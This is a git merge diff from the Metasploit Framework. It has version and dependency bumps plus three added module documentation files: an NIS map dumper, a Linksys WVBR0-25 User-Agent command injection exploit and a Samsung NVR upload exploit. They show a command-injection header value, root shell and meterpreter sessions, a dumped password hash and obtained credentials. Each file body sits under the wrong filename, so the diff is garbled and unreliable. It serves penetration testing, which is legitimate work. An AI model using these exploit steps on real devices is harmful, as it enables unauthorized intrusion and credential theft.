Merge branch 'rapid7/master' into goliath

Author: jbarnett-r7

.mailmap

@@ -1,6 +1,7 @@
 acammack-r7 <acammack-r7@github>     <[email protected]>
 acammack-r7 <acammack-r7@github>     <[email protected]>
 acammack-r7 <acammack-r7@github>     <[email protected]>
+asoto-r7 <asoto-r7@github>           <[email protected]>
 bcook-r7 <bcook-r7@github>           <[email protected]>
 bcook-r7 <bcook-r7@github>           <[email protected]>
 bpatterson-r7 <bpatterson-r7@github> <“[email protected]”>
@@ -30,6 +31,7 @@ lsanchez-r7 <lsanchez-r7@github>     <[email protected]>
 lsanchez-r7 <lsanchez-r7@github>     <[email protected]>
 lsato-r7 <lsato-r7@github>           <[email protected]>
 lvarela-r7 <lvarela-r7@github>       <“[email protected]”>
+mkienow-r7 <mkienow-r7@github>       <[email protected]>
 pbarry-r7 <pbarry-r7@github>         <[email protected]>
 pdeardorff-r7 <pdeardorff-r7@github> <[email protected]>
 pdeardorff-r7 <pdeardorff-r7@github> <[email protected]>

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2017, Rapid7, Inc.
+Copyright (C) 2006-2018, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.29)
+    metasploit-framework (4.16.32)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -10,6 +10,7 @@ PATH
       bcrypt_pbkdf
       bit-struct
       dnsruby
+      faker
       filesize
       jsobfu
       json
@@ -124,12 +125,14 @@ GEM
     factory_girl_rails (4.9.0)
       factory_girl (~> 4.9.0)
       railties (>= 3.0.0)
+    faker (1.8.7)
+      i18n (>= 0.7)
     faraday (0.13.1)
       multipart-post (>= 1.2, < 3)
     ffi (1.9.18)
     filesize (0.1.1)
     fivemat (1.3.5)
-    google-protobuf (3.5.0)
+    google-protobuf (3.5.1)
     googleapis-common-protos-types (1.0.1)
       google-protobuf (~> 3.0)
     googleauth (0.6.2)
@@ -140,7 +143,7 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.8.0)
+    grpc (1.8.3)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
@@ -194,10 +197,10 @@ GEM
     metasploit_payloads-mettle (0.3.3)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.10.3)
+    minitest (5.11.1)
     mqtt (0.5.0)
-    msgpack (1.2.0)
-    multi_json (1.12.2)
+    msgpack (1.2.2)
+    multi_json (1.13.1)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.2.0)
@@ -291,22 +294,22 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.9)
+    rex-socket (0.1.10)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.15)
+    rex-text (0.2.16)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
     rspec (3.7.0)
       rspec-core (~> 3.7.0)
       rspec-expectations (~> 3.7.0)
       rspec-mocks (~> 3.7.0)
-    rspec-core (3.7.0)
+    rspec-core (3.7.1)
       rspec-support (~> 3.7.0)
     rspec-expectations (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2017, Rapid7, Inc.
+Copyright: 2006-2018, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided

data/exploits/CVE-2017-16666/dump.pcap

@@ -0,0 +1,108 @@
+## Intro
+
+If you've worked with old Unix systems before, you've probably
+encountered NIS (Network Information Service). The most familiar way of
+describing it is a sort of hybrid between DNS and LDAP.
+
+[Oracle][1] says the following about it:
+
+> NIS is a distributed naming service. It is a mechanism for identifying and locating network objects and resources. It provides a uniform storage and retrieval method for network-wide information in a transport-protocol and media-independent fashion.
+
+And on its use:
+
+> By running NIS, the system administrator can distribute administrative databases, called maps, among a variety of servers (master and slaves). The administrator can update those databases from a centralized location in an automatic and reliable fashion to ensure that all clients share the same naming service information in a consistent manner throughout the network.
+
+The module documented within will allow a tester to dump any map from an
+NIS server (running as `ypserv`). Usually, maps like `passwd.byname`
+contain things like hashes and user info, which can go a long way during
+a pentest.
+
+## Setup
+
+Set up NIS as per <https://help.ubuntu.com/community/SettingUpNISHowTo>.
+If the link is down, you can find it via the Wayback Machine.
+
+## Options
+
+**PROTOCOL**
+
+Set this to either TCP or UDP. TCP is the default due to easy discovery.
+
+**DOMAIN**
+
+Set this to your NIS domain.
+
+**MAP**
+
+Set this to the NIS map you want to dump. The default is `passwd`. You
+can use the nicknames described in the module info instead of the full
+map names.
+
+**XDRTimeout**
+
+Set this to the timeout in seconds for XDR decoding of the response.
+
+## Usage
+
+```
+msf > use auxiliary/gather/nis_ypserv_map
+msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.0.2
+rhost => 192.168.0.2
+msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
+domain => gesellschaft
+msf auxiliary(gather/nis_ypserv_map) > run
+
+[+] 192.168.0.2:111 - Dumping map passwd.byname on domain gesellschaft:
+list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+games:*:5:60:games:/usr/games:/usr/sbin/nologin
+news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+sys:*:3:3:sys:/dev:/usr/sbin/nologin
+backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
+uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
+bin:*:2:2:bin:/bin:/usr/sbin/nologin
+gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+sync:*:4:65534:sync:/bin:/bin/sync
+systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+uuidd:*:108:112::/run/uuidd:/bin/false
+dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+root:*:0:0:root:/root:/bin/bash
+sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
+systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+messagebus:*:107:111::/var/run/dbus:/bin/false
+_apt:*:105:65534::/nonexistent:/bin/false
+mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
+syslog:*:104:108::/home/syslog:/bin/false
+daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+pollinate:*:111:1::/var/cache/pollinate:/bin/false
+www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
+proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
+lxd:*:106:65534::/var/lib/lxd/:/bin/false
+
+[*] Auxiliary module execution completed
+msf auxiliary(gather/nis_ypserv_map) >
+```
+
+After dumping a map, you can find it stored in `loot` later. You should
+be able to run something like John the Ripper directly on the
+`passwd.byname` map.
+
+```
+msf auxiliary(gather/nis_ypserv_map) > loot
+
+Loot
+====
+
+host         service  type           name  content     info  path
+----         -------  ----           ----  -------     ----  ----
+192.168.0.2           passwd.byname        text/plain        /home/wvu/.msf4/loot/20180108143013_default_192.168.0.2_passwd.byname_509006.txt
+
+msf auxiliary(gather/nis_ypserv_map) >
+```
+
+[1]: https://docs.oracle.com/cd/E23824_01/html/821-1455/anis1-25461.html

documentation/modules/auxiliary/gather/nis_ypserv_map.md

@@ -0,0 +1,49 @@
+## Vulnerable Application
+
+  This module exploits a command injection vulnerability in the Linksys WVBR0-25 wireless video bridge. More information about the device itself can be found on AT&T's [manuals page](https://www.att.com/help/manuals/directv/dvrs.html) under the "DIRECTV Wireless Video Bridge Gen2 Product Manual" heading, as well as on this [unofficial product page](https://www.solidsignal.com/pview.asp?p=wvb). A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
+  The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.
+
+  There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection.
+
+  Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`.
+
+  Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit.
+
+## Verification Steps
+
+  1. Make sure the device is running.
+  2. Start msfconsole.
+  3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
+  4. Do: ```set payload cmd/unix/bind_netcat```
+  5. Do: ```set RHOST [ip]```
+  6. Do: ```exploit```
+  7. You should get a shell.
+
+## Options
+
+  **PAYLOAD**
+
+  The `generic` and `netcat` payload types are valid.
+
+## Scenarios
+
+### Firmware 1.0.39
+
+  The following is an example run getting a shell:
+
+  ```
+  msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
+  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
+  payload => cmd/unix/bind_netcat
+  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
+  RHOST => 10.0.0.104
+  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
+
+  [*] 10.0.0.104:80 - Trying to access the device ...
+  [*] Started bind handler
+  [*] 10.0.0.104:80 - Exploiting...
+  [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
+  id
+
+  uid=0(root) gid=0(root)
+  ```

documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md

@@ -0,0 +1,94 @@
+## Description
+
+Samsung NVR Recorder SRN-1670D is a high performance network video recorder. An arbitrary file
+upload vulnerability was found in the Web Viewer component, which could allow an authenticated
+user to upload a PHP payload to get code exuection. The vulnerable code can be found in
+network_ssl_upload.php:
+
+```php
+    22 $path = "./upload/";
+    23 $file = $_FILES[ "attachFile" ];
+    24 $isApply = ( int )$_POST[ "is_apply" ];
+    25 $isInstall = ( int )$_POST[ "isInstall" ];
+    26 $isCertFlag = ( int )$_POST[ "isCertFlag" ];
+    27 
+    28 // create socket
+    29 $N_message = "";
+    30 $sock = mySocket_create($_is_unix_socket);
+    31 $connected = mySocket_connect($_is_unix_socket, $sock);
+    32 
+    33 $loginInfo = new loginInfo();
+    34 $retLogin = loginManager( $connected, $sock, null, $loginInfo );
+    35 if ( ( $retLogin == true ) && ( $isApply == 2 || $isApply == 3 ) ) {
+    36  if ($connected) {
+    37   $id = $loginInfo->get_id();
+    38   $xmlFile = $id.'_config.xml';
+    39   $N_message = "dummy".nvr_command::DELIM;
+    40   $N_message .= "userid ".$id.nvr_command::DELIM;
+    41   
+    42   if ( $isInstall == 1 ) {
+    43    // File upload ===============================================================  
+    44    if ( $file[ "error" ] 0 ) {
+    45     $Error = "Error: ".$file[ "error" ];
+    46    } else {
+    47     $retFile = @copy( $file[ "tmp_name" ], $path.$file[ "name" ] );
+    48    }
+    49    // ===========================================================================
+    50   }
+```
+
+To avoid the need of authentication, the exploit also takes advantage of another vulnerability
+(CVE-2015-8279) in the log exporting function to read an aribtrary file from the remote machine
+in order to obtain credentials that can be used for the attack.
+
+## Vulnerable Application
+
+Samsung NVR Recorder SRN-1670D is a hardware:
+
+http://www.samsungcc.com.au/cctv/ip-nvr-solution/samsung-dvr-srn-1670d
+
+## Scenario
+
+```
+msf exploit(samsung_srv_1670d_upload_exec) > show options 
+
+Module options (exploit/multi/http/samsung_srv_1670d_upload_exec):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    192.168.1.200      yes       The target address.
+   RPORT    80               yes       The target port (TCP).
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.122      yes       The listen address
+   LPORT  4358             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Samsung SRN-1670D == 1.0.0.193
+
+
+msf exploit(samsung_srv_1670d_upload_exec) > exploit -j 
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.1.122:4358 
+msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails...
+[+] Credentials obtained successfully: admin:pass123!
+[*] Logging...
+[+] Authentication Succeeded
+[*] Generating payload[ eRdGKfFJ.php ]...
+[*] Uploading payload...
+[*] Executing payload...
+[*] Sending stage (33986 bytes) to 192.168.1.200
+[*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100
+```